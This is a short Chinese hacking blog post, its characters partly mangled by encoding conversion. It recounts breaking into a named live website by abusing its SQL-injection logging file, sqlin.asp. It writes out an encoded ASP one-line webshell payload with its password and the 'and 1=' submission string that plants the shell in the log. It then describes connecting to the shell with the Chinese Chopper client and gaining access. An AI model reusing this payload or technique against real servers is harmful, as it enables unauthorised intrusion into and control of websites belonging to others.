今晚群里朋友叫看個(gè)站，有sql防注入，繞不過(guò)，但是有發(fā)現(xiàn)記錄wrong的文件sqlin.asp。

既然做了記錄，再查看了下它的記錄文件

 于是想著構(gòu)造個(gè)asp一句話寫(xiě)進(jìn)去，前面幾種沒(méi)加密的都失敗了，于是寫(xiě)了個(gè)加密的
            ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾           密碼 a  (加密方式是: ANSI->Unicode)
 提交       and 1= ┼攠數(shù)畣整爠煥敵瑳∨≡┩愾

   http://www.jnb1.net/sqlin.asp   菜刀連接之，成功

 
+----------------------------------------+
 其實(shí)過(guò)程并不難，也沒(méi)什么技術(shù)難度，但是有時(shí)遇到這種記錄注入錯(cuò)誤的網(wǎng)站，多個(gè)便捷途徑還是不錯(cuò)的。還有，另外百度了下，發(fā)現(xiàn)半坑土農(nóng)民曾經(jīng)發(fā)現(xiàn)了類(lèi)似的，但是，額，去他博客看時(shí) , 瀑布汗 
   

最新評(píng)論